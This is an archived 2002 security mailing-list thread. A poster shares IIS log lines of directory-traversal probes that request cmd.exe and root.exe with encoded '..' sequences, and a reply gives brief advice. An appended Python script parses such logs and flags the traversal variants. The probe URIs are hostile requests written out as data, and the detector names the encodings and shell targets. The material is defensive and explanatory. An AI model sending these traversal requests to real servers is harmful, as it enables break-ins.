[Dshield] Web server attempt

Gasper, Rick rjgasper at kings.edu
Tue Jul 2 16:38:34 GMT 2002


There has been an increase in FXP-type scans. IIS seems to be vulnerable. Are you running IIS?

Basically they set up an FTP server to FTP server file transfer. Make sure you don't see a successful log entry result of 200 (I think); that would mean your server has been compromised.

Rick Gasper
Manager of Network Services
King's College 
Wilkes-Barre PA 18711
Phone: 570-208-5845
Fax: 570-208-5989
rjgasper at kings.edu


-----Original Message-----
From: Sue Young [mailto:smy at gcmlp.com] 
Sent: Tuesday, July 02, 2002 10:43 AM
To: 'list at dshield.org'
Subject: [Dshield] Web server attempt

This is the first time I've ever gotten hit from El Salvador - this guy is still hitting my web server today. This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV 
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management

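The log excerpt above is a run of directory-traversal probes against an IIS box, and the reply's practical advice is to look for the ones that came back with a 200 rather than the 404/500/401 shown. The following script is an added example, not code from either poster: a small detector that parses lines in the same IIS W3C extended log layout, normalises the encoded traversal variants (`..%5c..`, `..%2f..`, double-encoded `..%255c..`, and the overlong UTF-8 form that appears as a raw `Á` byte in the post, here written as `%c1%1c`), flags requests that reach `cmd.exe` or `root.exe`, and escalates any such request that got a 2xx status. The sample log is constructed, uses documentation address ranges instead of the addresses in the post, and its final probe line with a 200 is invented to show what the escalation looks like.

```python
import re
from urllib.parse import unquote

# Constructed sample in the IIS W3C extended log layout used in the post
# (date time c-ip - s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status ...).
# Addresses are documentation ranges; the 22:40:07 line with a 200 is made up
# to show a traversal request that the server actually answered.
SAMPLE_LOG = """\
2002-07-01 22:39:02 198.51.100.23 - 192.0.2.10 80 GET /scripts/root.exe /c+dir 404 -
2002-07-01 22:39:18 198.51.100.23 - 192.0.2.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:35 198.51.100.23 - 192.0.2.10 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 198.51.100.23 - 192.0.2.10 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:40:07 198.51.100.23 - 192.0.2.10 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200 -
2002-07-01 22:41:00 203.0.113.5 - 192.0.2.10 80 GET /index.html - 200 -
"""

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<client>\S+) - (?P<server>\S+) (?P<port>\d+) "
    r"(?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})"
)

# Binaries the probes in the post try to reach: cmd.exe is the stock shell,
# root.exe is the copy of it that earlier worm infections left in web roots.
TARGET_BINARIES = ("cmd.exe", "root.exe")


def normalise_path(stem: str) -> str:
    """Decode percent-encoding twice (catches %255c double encoding), then
    fold backslashes into slashes so every traversal variant looks alike."""
    decoded = unquote(unquote(stem, encoding="latin-1"), encoding="latin-1")
    return decoded.replace("\\", "/")


def classify(stem: str):
    """Return the list of reasons a request stem looks like a traversal probe
    (empty list for an ordinary request)."""
    path = normalise_path(stem)
    reasons = []
    if any(seg == ".." for seg in path.split("/")):
        reasons.append("dot-dot traversal")
    if any(ord(ch) > 0x7E or ord(ch) < 0x20 for ch in path):
        # Non-ASCII or control bytes in a URL path, such as the overlong
        # UTF-8 sequences IIS mis-decoded, do not occur in legitimate requests.
        reasons.append("malformed encoding in path")
    if path.lower().endswith(TARGET_BINARIES):
        reasons.append("request for command shell")
    return reasons


def analyse(log_text: str):
    """Parse log lines and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["stem"])
        if not reasons:
            continue
        status = int(m["status"])
        # A 2xx answer to a traversal request is the case the reply warns
        # about: the server executed or served what was asked for.
        severity = "critical" if 200 <= status < 300 else "probe"
        findings.append({
            "client": m["client"], "stem": m["stem"], "status": status,
            "severity": severity, "reasons": reasons,
        })
    return findings


def summarise(findings):
    """Count probes and successful requests per client address."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["client"], {"probe": 0, "critical": 0})
        entry[f["severity"]] += 1
    return summary


if __name__ == "__main__":
    results = analyse(SAMPLE_LOG)
    for f in results:
        print(f["severity"].upper(), f["client"], f["status"], f["stem"],
              "; ".join(f["reasons"]))
    print(summarise(results))
```

Run against the constructed sample it reports five findings from the probing address, four of them plain probes and one critical (the invented 200), and nothing for the ordinary `/index.html` request. The point of decoding twice and folding `\` to `/` before looking for `..` segments is that the log stores the stem as the client sent it, so a rule that only greps for `../` would miss three of the four variants in the post.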